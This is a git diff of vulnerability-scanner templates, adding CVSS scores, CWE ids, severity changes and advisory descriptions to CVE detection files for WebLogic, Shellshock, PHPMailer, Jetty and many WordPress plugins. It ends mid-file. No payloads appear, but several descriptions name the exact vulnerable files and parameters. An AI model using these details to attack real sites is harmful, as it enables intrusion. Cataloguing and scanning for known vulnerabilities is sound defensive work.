a/cves/2014/CVE-2014-4210.yaml b/cves/2014/CVE-2014-4210.yaml index cc9b0f8793..42932519fa 100644 --- a/cves/2014/CVE-2014-4210.yaml +++ b/cves/2014/CVE-2014-4210.yaml @@ -8,6 +8,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4210 - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html + description: "Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services." requests: - method: GET diff --git a/cves/2014/CVE-2014-4535.yaml b/cves/2014/CVE-2014-4535.yaml index 95bd42d005..8e6d8424d8 100644 --- a/cves/2014/CVE-2014-4535.yaml +++ b/cves/2014/CVE-2014-4535.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd - https://nvd.nist.gov/vuln/detail/CVE-2014-4535 tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4535 + cwe-id: CWE-79 + description: "Cross-site scripting (XSS) vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php." requests: - method: GET diff --git a/cves/2014/CVE-2014-4536.yaml b/cves/2014/CVE-2014-4536.yaml index d1f974d279..d226a920db 100644 --- a/cves/2014/CVE-2014-4536.yaml +++ b/cves/2014/CVE-2014-4536.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4536 + cwe-id: CWE-79 + description: "Multiple cross-site scripting (XSS) vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter." requests: - method: GET diff --git a/cves/2014/CVE-2014-6271.yaml b/cves/2014/CVE-2014-6271.yaml index 07e8d11779..6c5db06412 100644 --- a/cves/2014/CVE-2014-6271.yaml +++ b/cves/2014/CVE-2014-6271.yaml @@ -3,13 +3,18 @@ id: CVE-2014-6271 info: name: Shellshock author: pentest_swissky - severity: high + severity: critical description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications reference: - http://www.kb.cert.org/vuls/id/252743 - http://www.us-cert.gov/ncas/alerts/TA14-268A tags: cve,cve2014,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2014-6271 + cwe-id: CWE-78 requests: - method: GET path: diff --git a/cves/2014/CVE-2014-6308.yaml b/cves/2014/CVE-2014-6308.yaml index bc9fe62650..7b52384af9 100644 --- a/cves/2014/CVE-2014-6308.yaml +++ b/cves/2014/CVE-2014-6308.yaml @@ -6,6 +6,7 @@ info: severity: high reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html tags: cve,cve2014,lfi + description: "Directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php." requests: - method: GET diff --git a/cves/2014/CVE-2014-9094.yaml b/cves/2014/CVE-2014-9094.yaml index 81ae8ce817..12b29d2090 100644 --- a/cves/2014/CVE-2014-9094.yaml +++ b/cves/2014/CVE-2014-9094.yaml @@ -6,6 +6,7 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 tags: cve,2014,wordpress,xss,wp-plugin + description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter." requests: - method: GET diff --git a/cves/2015/CVE-2015-1000012.yaml b/cves/2015/CVE-2015-1000012.yaml index b9a13af787..75c35ff769 100644 --- a/cves/2015/CVE-2015-1000012.yaml +++ b/cves/2015/CVE-2015-1000012.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 tags: cve,cve2015,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2015-1000012 + cwe-id: CWE-200 + description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin" requests: - method: GET diff --git a/cves/2015/CVE-2015-2080.yaml b/cves/2015/CVE-2015-2080.yaml index f70ef7d40a..67ed7522de 100644 --- a/cves/2015/CVE-2015-2080.yaml +++ b/cves/2015/CVE-2015-2080.yaml @@ -3,7 +3,7 @@ id: CVE-2015-2080 info: name: Eclipse Jetty Remote Leakage author: pikpikcu - severity: medium + severity: high reference: - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html @@ -11,6 +11,11 @@ info: description: | The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak tags: cve,cve2015,jetty + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2015-2080 + cwe-id: CWE-200 requests: - method: POST diff --git a/cves/2015/CVE-2015-2807.yaml b/cves/2015/CVE-2015-2807.yaml index ddb93e60fb..b39565c245 100644 --- a/cves/2015/CVE-2015-2807.yaml +++ b/cves/2015/CVE-2015-2807.yaml @@ -8,6 +8,7 @@ info: - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ - https://nvd.nist.gov/vuln/detail/CVE-2015-2807 tags: cve,cve2015,wordpress,wp-plugin,xss + description: "Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter." requests: - method: GET diff --git a/cves/2015/CVE-2015-6544.yaml b/cves/2015/CVE-2015-6544.yaml index 63d74145e0..23b0e18646 100644 --- a/cves/2015/CVE-2015-6544.yaml +++ b/cves/2015/CVE-2015-6544.yaml @@ -8,6 +8,11 @@ info: Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title. reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544 tags: cve,cve2015,xss,itop + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2015-6544 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2015/CVE-2015-8349.yaml b/cves/2015/CVE-2015-8349.yaml index cc437482ec..266da313a8 100644 --- a/cves/2015/CVE-2015-8349.yaml +++ b/cves/2015/CVE-2015-8349.yaml @@ -7,6 +7,11 @@ info: description: Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2015-8349 tags: cve,cve2015,xss,sourcebans + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2015-8349 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2015/CVE-2015-8399.yaml b/cves/2015/CVE-2015-8399.yaml index dbe4e9c097..55ff02a7c7 100644 --- a/cves/2015/CVE-2015-8399.yaml +++ b/cves/2015/CVE-2015-8399.yaml @@ -6,6 +6,11 @@ info: description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. reference: https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro tags: cve,cve2015,atlassian,confluence + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2015-8399 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2015/CVE-2015-8813.yaml b/cves/2015/CVE-2015-8813.yaml index 35e2bc110b..d9b0c56e21 100644 --- a/cves/2015/CVE-2015-8813.yaml +++ b/cves/2015/CVE-2015-8813.yaml @@ -9,6 +9,11 @@ info: - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2015-8813 tags: cve,cve2015,ssrf,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N + cvss-score: 8.20 + cve-id: CVE-2015-8813 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2015/CVE-2015-9414.yaml b/cves/2015/CVE-2015-9414.yaml index d5c3fea0f8..d65a7b2262 100644 --- a/cves/2015/CVE-2015-9414.yaml +++ b/cves/2015/CVE-2015-9414.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095 - https://nvd.nist.gov/vuln/detail/CVE-2015-9414 tags: cve,cve2015,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2015-9414 + cwe-id: CWE-79 + description: "The wp-symposium plugin through 15.8.1 for WordPress has XSS via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter." requests: - method: GET diff --git a/cves/2015/CVE-2015-9480.yaml b/cves/2015/CVE-2015-9480.yaml index bcd3d48d4d..aff9aca94d 100644 --- a/cves/2015/CVE-2015-9480.yaml +++ b/cves/2015/CVE-2015-9480.yaml @@ -8,6 +8,12 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480 - https://www.exploit-db.com/exploits/37252 tags: cve,cve2015,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2015-9480 + cwe-id: CWE-22 + description: "The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter." requests: - method: GET diff --git a/cves/2016/CVE-2016-0957.yaml b/cves/2016/CVE-2016-0957.yaml index 676d804499..55a0fb1e4e 100644 --- a/cves/2016/CVE-2016-0957.yaml +++ b/cves/2016/CVE-2016-0957.yaml @@ -7,6 +7,10 @@ info: reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html severity: high tags: cve,cve2016,adobe,aem + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2016-0957 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000126.yaml b/cves/2016/CVE-2016-1000126.yaml index 0d3a928804..7570661517 100644 --- a/cves/2016/CVE-2016-1000126.yaml +++ b/cves/2016/CVE-2016-1000126.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000126 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin admin-font-editor v1.8" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000127.yaml b/cves/2016/CVE-2016-1000127.yaml index 459e6c5829..51c400aa1e 100644 --- a/cves/2016/CVE-2016-1000127.yaml +++ b/cves/2016/CVE-2016-1000127.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin ajax-random-post v2.00 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000127 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000128.yaml b/cves/2016/CVE-2016-1000128.yaml index b0abb144a2..9e8645e466 100644 --- a/cves/2016/CVE-2016-1000128.yaml +++ b/cves/2016/CVE-2016-1000128.yaml @@ -9,6 +9,11 @@ info: - http://www.vapidlabs.com/wp/wp_advisory.php?v=161 - https://wordpress.org/plugins/anti-plagiarism tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000128 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000129.yaml b/cves/2016/CVE-2016-1000129.yaml index 9b0f14449b..fbeb35821b 100644 --- a/cves/2016/CVE-2016-1000129.yaml +++ b/cves/2016/CVE-2016-1000129.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000129 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000130.yaml b/cves/2016/CVE-2016-1000130.yaml index 18141078b1..04c6324c51 100644 --- a/cves/2016/CVE-2016-1000130.yaml +++ b/cves/2016/CVE-2016-1000130.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin e-search v1.0 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000130 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000131.yaml b/cves/2016/CVE-2016-1000131.yaml index a9c8dcbf8d..f9e0d4a700 100644 --- a/cves/2016/CVE-2016-1000131.yaml +++ b/cves/2016/CVE-2016-1000131.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000131 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin e-search v1.0" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000132.yaml b/cves/2016/CVE-2016-1000132.yaml index fa9404875a..c33a51fe7a 100644 --- a/cves/2016/CVE-2016-1000132.yaml +++ b/cves/2016/CVE-2016-1000132.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000132 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000133.yaml b/cves/2016/CVE-2016-1000133.yaml index 48e7531114..64968b022f 100644 --- a/cves/2016/CVE-2016-1000133.yaml +++ b/cves/2016/CVE-2016-1000133.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000133 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000134.yaml b/cves/2016/CVE-2016-1000134.yaml index 99d42687c9..d11a917306 100644 --- a/cves/2016/CVE-2016-1000134.yaml +++ b/cves/2016/CVE-2016-1000134.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin hdw-tube v1.2 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000134 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000135.yaml b/cves/2016/CVE-2016-1000135.yaml index 48480b29c5..5fbb768196 100644 --- a/cves/2016/CVE-2016-1000135.yaml +++ b/cves/2016/CVE-2016-1000135.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin hdw-tube v1.2 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000135 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000137.yaml b/cves/2016/CVE-2016-1000137.yaml index 12a3ce8d62..eb4ae2195c 100644 --- a/cves/2016/CVE-2016-1000137.yaml +++ b/cves/2016/CVE-2016-1000137.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=658 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000137 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin hero-maps-pro v2.1.0" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000138.yaml b/cves/2016/CVE-2016-1000138.yaml index b92f330cd6..ee73a4ce9f 100644 --- a/cves/2016/CVE-2016-1000138.yaml +++ b/cves/2016/CVE-2016-1000138.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=38 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000138 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin indexisto v1.0.5" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000139.yaml b/cves/2016/CVE-2016-1000139.yaml index 05a6a6285a..b3ff2bbb88 100644 --- a/cves/2016/CVE-2016-1000139.yaml +++ b/cves/2016/CVE-2016-1000139.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139 tags: cve,cve2016,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000139 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin infusionsoft v1.5.11" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000140.yaml b/cves/2016/CVE-2016-1000140.yaml index 8f25cbc37c..32a78c7534 100644 --- a/cves/2016/CVE-2016-1000140.yaml +++ b/cves/2016/CVE-2016-1000140.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000140 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000140 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin new-year-firework v1.1.9" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000146.yaml b/cves/2016/CVE-2016-1000146.yaml index b45691d8da..4d9e921b14 100644 --- a/cves/2016/CVE-2016-1000146.yaml +++ b/cves/2016/CVE-2016-1000146.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000146 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin pondol-formmail v1.1" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000148.yaml b/cves/2016/CVE-2016-1000148.yaml index fbb5d33d47..7340d0b0c2 100644 --- a/cves/2016/CVE-2016-1000148.yaml +++ b/cves/2016/CVE-2016-1000148.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000148 tags: cve,cve2016,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000148 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin s3-video v0.983" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000149.yaml b/cves/2016/CVE-2016-1000149.yaml index b5e0487209..7998ec03d5 100644 --- a/cves/2016/CVE-2016-1000149.yaml +++ b/cves/2016/CVE-2016-1000149.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000149 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin simpel-reserveren v3.5.2" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000152.yaml b/cves/2016/CVE-2016-1000152.yaml index 2dd82e5904..d44cabdaa9 100644 --- a/cves/2016/CVE-2016-1000152.yaml +++ b/cves/2016/CVE-2016-1000152.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin tidio-form v1.0 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000152 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000153.yaml b/cves/2016/CVE-2016-1000153.yaml index e1ae1a74aa..8e9ef8b66c 100644 --- a/cves/2016/CVE-2016-1000153.yaml +++ b/cves/2016/CVE-2016-1000153.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000153 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000153 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin tidio-gallery v1.1" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000154.yaml b/cves/2016/CVE-2016-1000154.yaml index c459fd33e9..dfbff06092 100644 --- a/cves/2016/CVE-2016-1000154.yaml +++ b/cves/2016/CVE-2016-1000154.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin whizz v1.0. reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000154 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000155.yaml b/cves/2016/CVE-2016-1000155.yaml index 4772141fcf..70f109f44c 100644 --- a/cves/2016/CVE-2016-1000155.yaml +++ b/cves/2016/CVE-2016-1000155.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000155 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin wpsolr-search-engine v7.6" requests: - method: GET diff --git a/cves/2016/CVE-2016-10033.yaml b/cves/2016/CVE-2016-10033.yaml index 479d0f70f3..ff51ed5643 100644 --- a/cves/2016/CVE-2016-10033.yaml +++ b/cves/2016/CVE-2016-10033.yaml @@ -2,10 +2,15 @@ id: CVE-2016-10033 info: name: Wordpress 4.6 Remote Code Execution author: princechaddha - severity: high + severity: critical description: The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property. reference: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html tags: wordpress,cve,cve2016,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2016-10033 + cwe-id: CWE-77 requests: - raw: diff --git a/cves/2016/CVE-2016-10956.yaml b/cves/2016/CVE-2016-10956.yaml index 4134b4a8b4..e70c75ed3a 100644 --- a/cves/2016/CVE-2016-10956.yaml +++ b/cves/2016/CVE-2016-10956.yaml @@ -9,6 +9,11 @@ info: - https://cxsecurity.com/issue/WLB-2016080220 - https://wpvulndb.com/vulnerabilities/8609 tags: cve,cve2016,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2016-10956 + cwe-id: CWE-20 requests: - method: GET diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml index 9f3466faaa..7d70ef5104 100644 --- a/cves/2016/CVE-2016-10960.yaml +++ b/cves/2016/CVE-2016-10960.yaml @@ -3,13 +3,18 @@ id: CVE-2016-10960 info: name: wSecure Lite < 2.4 - Remote Code Execution (RCE) author: daffainfo - severity: critical + severity: high description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter. reference: - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 tags: cve,cve2016,wordpress,wp-plugin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2016-10960 + cwe-id: CWE-20 requests: - method: POST diff --git a/cves/2016/CVE-2016-10993.yaml b/cves/2016/CVE-2016-10993.yaml index 5dcf8191cd..0f3716e9fe 100644 --- a/cves/2016/CVE-2016-10993.yaml +++ b/cves/2016/CVE-2016-10993.yaml @@ -8,6 +8,12 @@ info: - https://www.vulnerability-lab.com/get_content.php?id=1808 - https://nvd.nist.gov/vuln/detail/CVE-2016-10993 tags: cve,cve2016,wordpress,wp-theme,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2016-10993 + cwe-id: CWE-79 + description: "The ScoreMe theme through 2016-04-01 for WordPress has XSS via the s parameter." requests: - method: GET diff --git a/cves/2016/CVE-2016-2004.yaml b/cves/2016/CVE-2016-2004.yaml index 639320dfc8..8111ac538d 100644 --- a/cves/2016/CVE-2016-2004.yaml +++ b/cves/2016/CVE-2016-2004.yaml @@ -9,6 +9,11 @@ info: reference: - https://www.exploit-db.com/exploits/39858 - https://nvd.nist.gov/vuln/detail/CVE-2016-2004 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2016-2004 + cwe-id: CWE-306 network: - inputs: diff --git a/cves/2016/CVE-2016-2389.yaml b/cves/2016/CVE-2016-2389.yaml index a65ee5deea..364e21e9ba 100644 --- a/cves/2016/CVE-2016-2389.yaml +++ 